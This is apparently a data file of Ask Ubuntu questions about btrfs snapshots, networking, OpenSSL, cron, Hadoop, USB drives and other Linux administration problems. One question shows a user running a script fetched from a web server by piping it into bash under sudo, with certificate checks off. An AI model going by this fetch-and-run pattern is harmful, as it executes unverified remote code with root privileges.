441375	ca n't delete a btrfs snapshot	i can not delete the `` apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 '' btrfs snapshot . here are the details : root @ cioco : ~ # btrfs subvolume list -s / id 261 gen 246 cgen 245 top level 5 otime 2013-10-19 00:52:26 path @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 root @ cioco : ~ # btrfs subvolume list / id 256 gen 334584 top level 5 path @ id 258 gen 334134 top level 5 path @ home id 261 gen 246 top level 5 path @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 id 267 gen 334580 top level 256 path var/lib/lxc/mythtv/rootfs id 268 gen 334584 top level 256 path var/lib/lxc/jira/rootfs id 278 gen 279278 top level 256 path var/lib/lxc/michele/rootfs root @ cioco : ~ # grep btrfs /proc/self/mountinfo 20 1 0:16 / @ / rw , relatime - btrfs /dev/sda2 rw , compress=zlib , space_cache 39 20 0:16 / @ home /home rw , relatime - btrfs /dev/sda2 rw , compress=zlib , space_cache root @ cioco : ~ # btrfs subvolume delete / @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 error : error accessing '/ @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 ' however i can delete a snapshot created by me : root @ cioco : ~ # btrfs subvolume snapshot / root-snap create a snapshot of '/ ' in './root-snap' root @ cioco : ~ # btrfs subvolume list -s / id 261 gen 246 cgen 245 top level 5 otime 2013-10-19 00:52:26 path @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 id 309 gen 334592 cgen 334592 top level 256 otime 2014-03-31 02:19:08 path root/root-snap root @ cioco : ~ # btrfs subvolume delete /root/root-snap delete subvolume '/root/root-snap' edit1 : there is nothing logged in the kernel log : root @ cioco : ~ # dmesg -c > /dev/null root @ cioco : ~ # btrfs subvolume delete / @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 error : error accessing '/ @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26' root @ cioco : ~ # dmesg root @ cioco : ~ # but strace gives a hint : root @ cioco : ~ # strace btrfs subvolume delete / @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 ... stat ( `` / @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 '' , 0x7fffe88ebb60 ) = -1 enoent ( no such file or directory ) write ( 2 , `` error : error accessing '/ @ apt-sn '' ... , 82error : error accessing '/ @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26' ) = 82 edit2 : i 've mounted the volume ... root @ cioco : ~ # mkdir /snapshot root @ cioco : ~ # mount /dev/sda2 /snapshot -o subvol=/ @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 root @ cioco : ~ # grep btrfs /proc/self/mountinfo 20 1 0:16 / @ / rw , relatime - btrfs /dev/sda2 rw , compress=zlib , space_cache 39 20 0:16 / @ home /home rw , relatime - btrfs /dev/sda2 rw , compress=zlib , space_cache 61 20 0:16 / @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 /snapshot rw , relatime - btrfs /dev/sda2 rw , compress=zlib , space_cache root @ cioco : ~ # btrfs subvolume delete /snapshot/ delete subvolume '//snapshot' error : can not delete '//snapshot ' - invalid argument root @ cioco : ~ # strace btrfs subvolume delete /snapshot/ ... stat ( `` /snapshot '' , { st_mode=s_ifdir|0755 , st_size=230 , ... } ) = 0 brk ( 0 ) = 0x2206000 brk ( 0x2228000 ) = 0x2228000 lstat ( `` /snapshot '' , { st_mode=s_ifdir|0755 , st_size=230 , ... } ) = 0 stat ( `` / '' , { st_mode=s_ifdir|0755 , st_size=242 , ... } ) = 0 openat ( at_fdcwd , `` / '' , o_rdonly|o_nonblock|o_directory|o_cloexec ) = 3 fstat ( 1 , { st_mode=s_ifchr|0600 , st_rdev=makedev ( 136 , 23 ) , ... } ) = 0 mmap ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0x7fd8ad2ae000 write ( 1 , `` delete subvolume '//snapshot'\n '' , 30delete subvolume '//snapshot' ) = 30 ioctl ( 3 , btrfs_ioc_snap_destroy , 0x7fff5f1e5878 ) = -1 einval ( invalid argument ) close ( 3 ) = 0 write ( 2 , `` error : can not delete '//snapshot '' ... , 53error : can not delete '//snapshot ' - invalid argument ) = 53 ... root @ cioco : ~ # dmesg [ 3172764.459166 ] device label cioco-root devid 1 transid 336213 /dev/sda2 edit3 : solution root @ cioco : ~ # mount /dev/sda2 /btrfs-root/ root @ cioco : ~ # ls -l /btrfs-root/ total 0 drwxr-xr-x 1 root root 262 apr 1 08:31 @ drwxr-xr-x 1 root root 230 oct 16 22:53 @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26 drwxr-xr-x 1 root root 6 oct 16 22:13 @ home root @ cioco : ~ # btrfs subvolume delete /btrfs-root/ @ apt-snapshot-release-upgrade-saucy-2013-10-19_00\:52\:26/ delete subvolume '/btrfs-root/ @ apt-snapshot-release-upgrade-saucy-2013-10-19_00:52:26' root @ cioco : ~ # dmesg [ 41113.537617 ] device label cioco-root devid 1 transid 337615 /dev/sda2 any help would be appreciated .
441380	ethernet is unstable - ubuntu 13.10	upon booting into ubuntu 13.10 i can connect to my wired connection . it connects with no issues whatsoever and in fact it never disconnects at all . however , the connection is insanely unstable and becomes unusable when pages do n't load . the connection somehow `` resets '' or something every few minutes and is usable for another couple of minutes until it drops out again . i 'm not sure what the problem is and i 'm not sure what sort of logs or information to post in order to gain help , so please suggest any and i will respond quickly ! this is a 64-bit distribution of ubuntu and the command lspci | grep -i eth returns : 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) thanks
441382	install gimagereader in kubuntu - my last step of getting rid of windows	hope all are doing well . i have been windows-free for almost two weeks now . and i am not even using wine , to use windows software . initially i installed ubuntu , then i shifted to kubuntu [ i like the kde desktop environment ] there is a niggle that has compelled me to move to my windows partition from yesterday . i was using gscan2pdf for scanning and ocr using tessearct . this is very important to me in terms of my studies . [ i am a medical physician ] gscan2pdf has stopped working in kubuntu . i tried to use the ocr feeder . that does the job , but not quite perfectly . then visiting a popular blog , i found of gimagereader , i downloaded the .deb package of gimagereader from sourcefourge and installed it at kubuntu . the gimagereader is showing alright in the applications list . but when i click the icon nothing is happening . i installed the .exe file of gimagereader in windows along with tesseract , that seems to work fine . please help me in installing gimagereader to kubuntu , i do not want to stay in windows for long sincerely waiting for some help . thanks in advance . sources : popular blog i was referring to - http : //www.webupd8.org/2011/03/gimagereader-tesseract-ocr-gui-gets.html gimagereader at sourcefourge - http : //sourceforge.net/projects/gimagereader/
441388	how to update/repair the grub customizer ?	when my pc ( running canonical ubuntu 12.04 lts precise pangolin ) updated it 's linux kernel from `` 3.11.0-15-generic '' to `` 3.11.0-18-generic '' , the grub customizer does n't work anymore . it does not make any changes to the boot menu , but it shows that it has made changes to the boot menu . how can i solve this problem ?
441395	keyboard shortcut to focus on ( idle ) terminal	i would like to know , if there is possible to use keyboard shortcut to focus on first idle ( non working ) terminal window in unity ( 13.10 ) ? something like ctr+alt+t , but before opening the new instance of terminal , searching for any idle instance ?
441397	downgrade openssl 1.0.1 to open 0.9.8 on precise	can you please tell how we can downgrade openssl 1.0.1 to open 0.9.8 on precise . i can see libssl0.9.8 when i do apt-cache search libssl ( i dont see anything with apt-cache search openssl ) , will apt-cache install libssl0.9.8 will degrade existing openssl 1.0.1 to 0.9.8 ? if not , how we can do that and what is the after-effects of doing so..
441400	how to resume partial downloads using transmission ?	can we resume partial torrent downloads using the default transmission software ? i started 500 mb download which was downloaded half way . now i ca n't seem to resume the download .
441402	installing ubuntu in google nexus 7 tablet	i would like to install ubuntu in my new nexus-7 tab , can you please help me with complete installation procedure ?
441405	problem when searching ´twe´ in dash	when i a write ´twe´ in dash to search for tweak , my laptop fails . i tried it with other words it works fine . my laptop is hp dv6 , core 2 duo , running on ubuntu 13.10 64bit , dual boot with windows 7 on a different partition .
441407	can i use ubuntu server as a desktop ?	an older relative of mine still has windows xp . the hardware is ok for xp , but definetively too weak for windows 7 . also , i think , ubuntu would be a nice os for him to work with , since it 's easy and has a great feel . hardware the machine has 1 processor with one core ( 3 ghz ) [ intel ( r ) pentium ( r ) 4 cpu 3.00ghz ] , 1,5 gb ram , 80 gb hdd . but it has some weird vga-chip [ via/s3g unichrome pro igp ] problem i installed ubuntu 12.04 , lubuntu 13.04 , xubuntu 13.10 and even linux mint : i simply can not get a desktop . all the installations run without problems , but i keep getting stuck with the system is running in low-graphics mode . i tried all the answers to this problem ( since there is a good thread concerning this error here ) , but i think , the vga-chip simply does n't do it ( someone wrote `` unity requires : any graphics card with opengl 1.4 support '' ) . i spent two days , trying to get to a desktop , i could n't succeed . solution ? out of curiosity , i installed ubuntu 8 , which worked fine . of course , i could n't update it . then , by accident , i installed ubuntu server 10 ( instead of ubuntu desktop 10 ) . after the installation , i installed a desktop ( sudo apt-get install ubuntu-desktop ) . then , i updated to ubuntu server 12.04 , still with desktop . everything works fine . i have an ubuntu lts with a working desktop . question *is there any serious reason , why i should n't run a ubuntu server as a desktop ? * the guy , i 'm doing this for , just wants : - open office or libre office - internet browser ( firefox would be good ) - thunderbird - skype ( yeah , it 's microsoft ... but some of his relatives are outside the country and using skype ) - software for viewing and collecting photos - to use a hp laserprinter , a standard-webcam ( for skype ) and card-reader everything should n't be a problem , as far as i see it . if there is a problem with running a server os as a desktop : is there any other way to install ubuntu desktop and tell the os not to use any kind of desktop-features , that need newer vga-cards ( kind of like the windows 2000 theme ) ? yeah , i could make him buy a new pc , but i just hate to waste . this guy does n't want to play the newest games , cut videos or render 3d-graphics . he just needs some office-programs and internet-access . what do you think ? regards ,
441413	disable tls1.1 in openssl	i have precise ubuntu server that has openssl 1.0.1 installed . when i try to connect to my apache server with version 2.2.14 and openssl 0.9.8 installed on some other server , i get the below error : : /etc/ssl # openssl s_client -connect x.x.x.x:4444 connected ( 00000003 ) 140705541154464 : error:140773e8 : ssl routines : ssl23_get_server_hello : reason ( 1000 ) : s23_clnt.c:724 : no peer certificate available no client certificate ca names sent ssl handshake has read 7 bytes and written 225 bytes new , ( none ) , cipher is ( none ) secure renegotiation is not supported compression : none expansion : none but if i use -tls1 or -ssl3 switch , it works fine . it seems openssl 1.0.1 is using tlsv1.1 and we need to disable it . can you please tell how can we disable it and enable tls1/ssl3
441414	is there any problem with drivers when lshw shows serial and power as unclaimed ?	recently i set up a new server with ubuntu server 12.04 . the motherboard model is : gigabyte h81m-ds2v . i think i have some problem with the drivers . here is the output of lshw : *-serial unclaimed description : smbus product : 8 series/c220 series chipset family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : f0519000-f05190ff ioport : f040 ( size=32 ) *-power unclaimed description : to be filled by o.e.m . product : to be filled by o.e.m . vendor : to be filled by o.e.m . physical id : 1 version : to be filled by o.e.m . serial : to be filled by o.e.m . capacity : 32768mwh
441415	what has jockey been replaced with in 14.04 ?	just tried to run jockey-text on my test server and found that it 's not installed . looked for the jockey-common package and found nothing . even did a package search and there 's no release for trusty . i feel like i 've missed an important bit of news but what manages the `` additional drivers '' side of things in 14.04 ? has jockey been replaced or just renamed ?
441417	run bash script in client from local server ?	i wrote a bash script for my use and it works . i want that script to be put in some server in my network and call that script in laptops / desktops in my network itself to execute . any way i have made a way for that also as below . steps : install apache web server in local server . put the script in web server . make the script executable chmod a+x . open terminal in the client machine and install the package curl now from the client terminal itself execute the command as : sudo curl -kl http : //serverip/script.sh | bash it works fine but only problem is , in my script i have used user input commands like `` read variable '' , that doesnât work in this scenario . so how to do that is my problem . is there any way for me ?
441420	how to get around nvm checksum error ( pxe-e05 ) to make the ethernet work ?	i have toshiba portege m400 tablet pc with intel 82573l gigabit ethernet controller . it works fine with windows , but in ubuntu it does n't work ! during startup cmos shows the following : pxe-e05 error , lan adapter configuration not initialized , boot agent can not continue . i figured out that it was due to nvm checksum error , and i tried to flash eeprom using intel boot utility with no success . flashing eeprom always returned the following error : pxe not flashed on port 1 , firmware not present . i restored to kernel to edit driver files and bypass nvm checksum error again to lure without any fruitful outcome . here are some terminal output : $ lspci -v | grep 82573l 02:00.0 ethernet controller : intel corporation 82573l gigabit ethernet controller $ ifconfig -a just listed wlan0 only
441421	how to disable global menu and have always visible menu bars	is it possible to get menus to be shown in always visible menu bars in 14.04 , rather than in window title bars ?
441423	ubuntu one - can not stop synchronizing	i 've been using ubuntu one to upload my documents folder , but as it got too big , i wanted to clear my cloud account , reorganise the folders and try again . however , when i go to my ubuntu one page , go to files , i click on more , then on stop syncing this folder , i get a prompt asking me to confirm , i click ok but nothing happens . i tried doing it several times , waited for some time but the folder is still there and my cloud is clogged . any help would be appreciated .
441425	update package error	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
441427	no more ping no more internet	when my notebook was getting too slow i installed ubuntu 13.10 also on my desktop . initially the desktop worked fine but when i tried to connect to my modem the computer froze and since then i couldn connect to my modem anymore . i reinstalled ubuntu and now i can connect to the modem by wlan but not to the internet . pings are answerd `` with destination host unreachable '' . both computers ( notebook and desktop ) are connected to the same modem a friz ! box 7340 via wlan . when i compare the connection information on both computers only the ipv4 adres and the drivers differ . yet the notebook connects and the desktop does n't . what can be the problem ?
441430	how do i prevent unnecessary usb spin up ?	when i open a document in some applications , gedit for instance , i have to wait five to ten seconds while i can hear my usb disk spinning up . this happens even though the document i open resides on the internal hard drive . is there a way to prevent this ?
441432	ubuntu 12.04 dual monitor on nvidia quadro 2000m problems	i 've been struggling with this for a while and was hoping to get some answer i have a thinkpad w520 laptop and ubuntu 12.04 which i fail to get working with dual monitors . $ lspci | grep vga kreimer @ alex-w520 : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf106glm [ quadro 2000m ] ( rev a1 ) out of the box , using the default driver the system detects the 2nd monitor but it 's almost unusable due to refresh problems . i installed the nvidia supplied driver : screenshot this caused the external monitor to go blank . nvidia-settings just does n't seem to see this monitor : http : //postimg.org/image/fdmdv4m7j/ any help would be appreciated alex
441435	evolution displays wrong date	i 've got 2 servers both running fail2ban . but when i 'm recieving ban messages from one of those servers evolution displays ( and orders ) them 3 months ago . email header : return-path : < fail2ban @ xxxxxxxxxxxxxxx.nu > envelope-to : email @ xxxxxxxxxxxxx.eu delivery-date : mon , 31 mar 2014 10:42:04 +0200 received : from xxxxxxxxxxxxxx.nu ( [ xx.xx.xx.xx ] helo=xxxxxxxxxxxxxxxx.nu ) by xxxxxxxxxxxx.net with esmtp ( exim 4.82 ) ( envelope-from < fail2ban @ xxxxxxxxxxxxxxxxx.nu > ) id 1wuxn9-0007zr-uf for email @ xxxxxxxxxxxxxx.eu ; mon , 31 mar 2014 10:42:03 +0200 received : by xxxxxxxxxxxxxx.nu ( postfix , from userid 0 ) id c820c120447 ; mon , 31 mar 2014 10:36:54 +0200 ( cest ) subject : [ fail2ban ] ssh : banned 212.58.108.218 date : ma , 31 mrt 2014 08:36:54 +0000 from : fail2ban < fail2ban @ xxxxxxxxxxxxxxxxxxx.nu > to : email @ xxxxxxxxx.eu message-id : < 20140331083654.c820c120447 @ xxxxxxxxxxxxxxxx.nu > x-antivirus-scanner : clean mail though you should still use an antivirus x-evolution-pop3-uid : 0000210e4ea8ec2a x-evolution-source : 1270910685.2952.9 @ xxxxxxxxxxx.info mime-version : 1.0 but it displays : 31 jan 2014 so it 's like 3 months off . the email from the other server has the same headers but display 's okey in evolution . order by date does n't work ( well it will work but new email is displayd a long way down ) ordering bij recieved does work , but it still displays a wrong date inside the message list .
441440	scp command giving some path error	i want to copy an iso image from my file server to my xen server using scp . i gave the below command in my xen server console but it gaves me error , dont know whats going wrong . console on xen server where i want to copy : [ root @ xenserver isoz ] # scp user @ 192.168.1.155 : /home/user/isoz/12.04\ lts /server/12.04\ 64\ lts.iso . user @ 192.168.1.155 's password : scp : /home/user/isoz/12.04 : no such file or directory scp : lts : no such file or directory cp : can not stat `/server/12.04 64 lts.iso ' : no such file or directory this is the file location on my file server i am trying to copy : user @ server : ~/isoz/12.04 lts /server $ ls 12.04 64 lts.iso list list~ ubuntu-12.10-server-i386.iso user @ server : ~/isoz/12.04 lts /server $ user @ server : ~/isoz/12.04 lts /server $ pwd /home/user/isoz/12.04 lts /server can anyone please correct my scp command
441446	expecting authentication method via either a service token , -- os-token	i have openstack installed . when i try to execute this command keystone user-list i get this expecting authentication method via either a service token , -- os-token or env [ os_service_token ] , or credentials , -- os-username or env [ os_username ] . how do i specify a token ?
441450	use gcc-4.6-arm-linux-gnueabihf to compile .c file , what is the command ?	i am doing cross compiling . i install the gcc-4.6-arm-linux-gnueabihf and want to use it to compile the .c file ( example of hello world ) and then run it on arm . i do n't know what is the exact command . commands like `` gcc -c filenam.c '' seem not correct . thanks for answering .
441451	why cron.weekly started apt-xapian-index at 11am instead of between 2-4am ?	i have redifined staring hours in /etc/anacrontab and /etc/crontab like following : -- - my changes : 17 * * * * root cd / & & nice run-parts -- report /etc/cron.hourly 25 3 * * * root test -x /usr/sbin/anacron || ( cd / & & nice run-parts -- report /etc/cron.daily ) 47 3 * * 7 root test -x /usr/sbin/anacron || ( cd / & & nice run-parts -- report /etc/cron.weekly ) 52 3 1 * * root test -x /usr/sbin/anacron || ( cd / & & nice run-parts -- report /etc/cron.monthly ) -- - original : # 17 * * * * root cd / & & run-parts -- report /etc/cron.hourly # 25 6 * * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) # 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.weekly ) # 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.monthly ) /etc/anacrontab : start_hours_range=2-4 # anacron jobs will start between 2 and 4 o'clock . 1 5 cron.daily nice run-parts -- report /etc/cron.daily 7 10 cron.weekly nice run-parts -- report /etc/cron.weekly @ monthly 15 cron.monthly nice run-parts -- report /etc/cron.monthly why the script 'apt-xapian-index ' started after i logged in ( at ~ 11am ) instead of in the early morning hours ( 2-4am ) as i defined it in the config ? is it standart behaviour when cron.daily , cron.weekly has been missed because the computer has been switched off than after first log in it is gogn to run all missed cron jobs ? how can i do it that i want to run those daily/weekly/monthly cron jobs run between 2-4 o'clock in the morning and do not run them during the day at all cost . thank you , kind regards , martin
441453	formatting not working error showing in pendrive ( error showing ) ?	error creating file system : command-line `parted -- script `` /dev/sdb '' mktable msdos ' exited with non-zero exit status 1 : error : input/output error during read on /dev/sdb ( udisks-error-quark , 0 ) did it through disks- > more actions- > format anybody help ? if any further details needed i can provide ?
441457	ubuntu from usb 3.0 will it run at 3.0 by default	i am planning on installing ubuntu on a usb key and booting from that . my laptop has usb 3.0 and i have a usb 3.0 . ( i have the driver working in windows , so i know it works ) how can i also ensure this is setup in ubuntu so i get good data speeds between the usb and the computer . i.e . iâd like to see how ubuntu from usb 3.0 performs , is there a way to make this happen as the install of the driver for 3.0 happens in windows not in the bios .
441458	can a windows virus transfer to ubuntu ?	before i removed windows 7 from my computer and replaced it with ubuntu , i had over 257 threats that never would go away . i do n't know if the trojan horse i had also could transfer over to ubuntu . can my computer be infected ? i 'm trying to be very careful when i use my computer , because i do n't want to get a new computer . i 've only had windows 7 and my pc , for only a few years . first , i took it to best buy and they said a trojan horse is supposed to be on the computer . the man only `` looked '' at it and since he put it in factory settings , it hid and stole my pc twice in a row . then , i took it somewhere to someone i know and they re-built it . but it had tons of issues again . my anti-virus and my programs and other files were disappearing right before my eyes . my wi-fi was turned off , and i couldnât turn it back on . it even shut down by itself . and it never did that before . will my infections from windows 7 transfer over to ubuntu ? just remember i do n't have windows 7 any more , i only have ubuntu .
441461	how to save changes in terminal	im trying to configure my mouse speed i set it up to a speed that i like using the terminal but when i restart the pc or shut down it losses all the setting i had input is there a way to save the changes so why work all the time . ps . ive only used linux for a couple of days now so the answer may be really obvious and i just dont have a clue thanks in advance
441463	problems using the start-dfs , sh on hadoop 2.2.0	im using this tutorial for installing hadoop 2.2.0 http : //codesfusion.blogspot.in/2013/10/setup-hadoop-2x-220-on-ubuntu.html i 've completed many of the steps successfully but i 'm stuck over this start-dfs.sh command . any help would be much appreciated ... i suppose the problem lies with the ssh config ? ? ? heres the output to start-dfs.sh sandesh @ sandesh-h87m-d3h : ~ $ su - hduser password : hduser @ sandesh-h87m-d3h : ~ $ start-dfs.sh 14/03/31 16:59:30 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable starting namenodes on [ openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c ' , or link it with '-z noexecstack ' . localhost ] sed : -e expression # 1 , char 6 : unknown option to `s' localhost : ssh : connect to host localhost port 22 : connection refused -c : unknown cipher type 'cd' vm : ssh : could not resolve hostname vm : name or service not known you : ssh : could not resolve hostname you : name or service not known link : ssh : could not resolve hostname link : name or service not known library : ssh : could not resolve hostname library : name or service not known 64-bit : ssh : could not resolve hostname 64-bit : name or service not known will : ssh : could not resolve hostname will : name or service not known now . : ssh : could not resolve hostname now . : name or service not known the : ssh : could not resolve hostname the : name or service not known warning : : ssh : could not resolve hostname warning : : name or service not known that : ssh : could not resolve hostname that : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known try : ssh : could not resolve hostname try : name or service not known library : ssh : could not resolve hostname library : name or service not known server : ssh : could not resolve hostname server : name or service not known vm : ssh : could not resolve hostname vm : name or service not known highly : ssh : could not resolve hostname highly : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known you : ssh : could not resolve hostname you : name or service not known loaded : ssh : could not resolve hostname loaded : name or service not known the : ssh : could not resolve hostname the : name or service not known openjdk : ssh : could not resolve hostname openjdk : name or service not known guard . : ssh : could not resolve hostname guard . : name or service not known ' , : ssh : could not resolve hostname ' , : name or service not known have : ssh : could not resolve hostname have : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known which : ssh : could not resolve hostname which : name or service not known noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known fix : ssh : could not resolve hostname fix : name or service not known with : ssh : could not resolve hostname with : name or service not known have : ssh : could not resolve hostname have : name or service not known might : ssh : could not resolve hostname might : name or service not known stack : ssh : could not resolve hostname stack : name or service not known or : ssh : could not resolve hostname or : name or service not known it : ssh : could not resolve hostname it : name or service not known with : ssh : could not resolve hostname with : name or service not known the : ssh : could not resolve hostname the : name or service not known fix : ssh : could not resolve hostname fix : name or service not known stack : ssh : could not resolve hostname stack : name or service not known recommended : ssh : could not resolve hostname recommended : name or service not known guard : ssh : could not resolve hostname guard : name or service not known to : ssh : connect to host to port 22 : connection refused localhost : ssh : connect to host localhost port 22 : connection refused starting secondary namenodes [ openjdk 64-bit server vm warning : you have loaded library /usr/local/hadoop/lib/native/libhadoop.so.1.0.0 which might have disabled stack guard . the vm will try to fix the stack guard now . it 's highly recommended that you fix the library with 'execstack -c ' , or link it with '-z noexecstack ' . 0.0.0.0 ] sed : -e expression # 1 , char 6 : unknown option to `s' -c : unknown cipher type 'cd' you : ssh : could not resolve hostname you : name or service not known disabled : ssh : could not resolve hostname disabled : name or service not known now . : ssh : could not resolve hostname now . : name or service not known guard : ssh : could not resolve hostname guard : name or service not known recommended : ssh : could not resolve hostname recommended : name or service not known 0.0.0.0 : ssh : connect to host 0.0.0.0 port 22 : connection refused have : ssh : could not resolve hostname have : name or service not known warning : : ssh : could not resolve hostname warning : : name or service not known with : ssh : could not resolve hostname with : name or service not known guard . : ssh : could not resolve hostname guard . : name or service not known loaded : ssh : could not resolve hostname loaded : name or service not known the : ssh : could not resolve hostname the : name or service not known fix : ssh : could not resolve hostname fix : name or service not known which : ssh : could not resolve hostname which : name or service not known have : ssh : could not resolve hostname have : name or service not known might : ssh : could not resolve hostname might : name or service not known openjdk : ssh : could not resolve hostname openjdk : name or service not known that : ssh : could not resolve hostname that : name or service not known it 's : ssh : could not resolve hostname it 's : name or service not known 64-bit : ssh : could not resolve hostname 64-bit : name or service not known it : ssh : could not resolve hostname it : name or service not known 'execstack : ssh : could not resolve hostname 'execstack : name or service not known stack : ssh : could not resolve hostname stack : name or service not known server : ssh : could not resolve hostname server : name or service not known try : ssh : could not resolve hostname try : name or service not known you : ssh : could not resolve hostname you : name or service not known ' , : ssh : could not resolve hostname ' , : name or service not known the : ssh : could not resolve hostname the : name or service not known fix : ssh : could not resolve hostname fix : name or service not known library : ssh : could not resolve hostname library : name or service not known will : ssh : could not resolve hostname will : name or service not known stack : ssh : could not resolve hostname stack : name or service not known library : ssh : could not resolve hostname library : name or service not known link : ssh : could not resolve hostname link : name or service not known with : ssh : could not resolve hostname with : name or service not known the : ssh : could not resolve hostname the : name or service not known noexecstack ' . : ssh : could not resolve hostname noexecstack ' . : name or service not known vm : ssh : could not resolve hostname vm : name or service not known vm : ssh : could not resolve hostname vm : name or service not known highly : ssh : could not resolve hostname highly : name or service not known '-z : ssh : could not resolve hostname '-z : name or service not known or : ssh : could not resolve hostname or : name or service not known to : ssh : connect to host to port 22 : connection refused 14/03/31 16:59:44 warn util.nativecodeloader : unable to load native-hadoop library for your platform ... using builtin-java classes where applicable hduser @ sandesh-h87m-d3h : ~ $
441464	always start google chrome in full screen	does anyone know a way to make chrome always start in full screen ? ( normally it 's when you press the button to the top right , you 'd find a `` full screen button '' in the zoom option ) . not f11 full screen ; it 's different ! try it .
441466	apt-get install < package > equivalent using c++ apt-pkg library	i am building a small qt ( c++ ) application where i ask user the software he want to install . once he selected some packages a , b , c from the list all i have to do is run sudo apt-get install a b c one way of doing this is using qprocess or system and run this command directly from c++ . but i thought this would be a hack and wanted to do using apt-pkg c++ library . but sadly documentation is very sparse for this library : ( i saw source codes of some similar softwares - software updater ( apt-watch ) etc and found it too complex . just to run above command , it has lot of code - initializing pkgcachefile , pkgiterator , pkgacqarchive . do i have to do all this to run this simple command ? is n't there a direct function which takes software name as argument and install it ? where can i get a sample working code for the same ?
441467	after truetype fonts intstallation , they are not availabe on openoffice	every tutorial or instructions for the installation of fonts like arial , times and so on in openoffice , say i have to install the âťtruetypeâť fonts . altough synaptic says i have the fonts installed , they do n't appear in the list of available fonts in openwriter . these are , for instance , all the fonts i get with initial a ( there should be arial ) . is there something i 'm missing in order to have access to those fonts ? i 'm on ubuntu 13.10 .
441470	unable to access windows files in ubuntu	am unable to access windows server ( 2008 ) files and folder in ubuntu 12.04 server i have installed samba client package
441472	vostro 1510 bluetooth issue on ubuntu 13.10	bluetooth status is on and visible , nevertheless can not be detected by other devices . it is not blocked , either soft nor hard . while using win xp the blue icon on the laptop panel was on , now with ubuntu 13.10 is off . wireless is working fine .
441474	how can you read that messages that are shown during boot before x starts ?	i edited in my /etc/default/grub , the following line : grub_cmdline_linux_default=quiet after that , sudo update-grub , and it now shows me the messages during boot . but how can i read that messages after x is started ? /var/log/boot.log does n't contain what i see there for a blink of an eye .
441478	why does sitecopy download only empty directories ?	i have a large remote ftp with about a half terabyte i need to make a local copy of and i set up sitecopy to do it for me . after tweaking the settings i ran : sitecopy -- fetch mysite.com then sitecopy -- synch -- keep-going mysite.com it appeared to have worked but it seems it stopped downloading the files in the various directories after a while . i do n't see a -r flag or something necessary in the man page . any ideas ? i may be better off using a different software . ubuntu server 12.04
441479	why does the terminal respond with `` 2 '' when i use who | wc -l	the title says it all . i 'm the only user on my computer , but when i type in who | wc -l , it responds with 2 . why is that ?
441481	how to install software packages on ubuntu ?	i have read everywhere possible to know how to install software packages on ubuntu , but i did n't understand exactly how to do that , they write many steps and i try them but never got satisfying result , i was n't successfull . explain me the process as if i am a beginner . explain the steps for all types i need to learn it .
441487	can not recognize/format usb flash	i had a flash stick with ubuntu to run as live usb . i did n't need it anymore so i used the disks utility and i formatted it . disks sees it now as unallocated space . i want to format it to ntfs but i can not do it with disks . gparted has no option for the device , no mount , no unmount , no format.. nothing . the flash does n't appear in gnome . finally , this is the result of running lsusb and fdisk -l ubuntu @ ubuntu : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 13fe:3e00 kingston technology company inc . bus 001 device 003 : id 050d:945a belkin components f7d1101 basic wireless usb adapter v1000 [ realtek rtl8188su ] bus 002 device 002 : id 046d : c52e logitech , inc . bus 002 device 003 : id 045e:0039 microsoft corp. intellimouse optical ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2c74badc device boot start end blocks id system /dev/sda1 * 63 4176899 2088418+ 7 hpfs/ntfs/exfat /dev/sda2 4176900 1953520064 974671582+ 7 hpfs/ntfs/exfat disk /dev/sdb : 16.0 gb , 16013852672 bytes 64 heads , 32 sectors/track , 15272 cylinders , total 31277056 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000540f8 device boot start end blocks id system ubuntu @ ubuntu : ~ $ any ideas to format it to ntfs ?
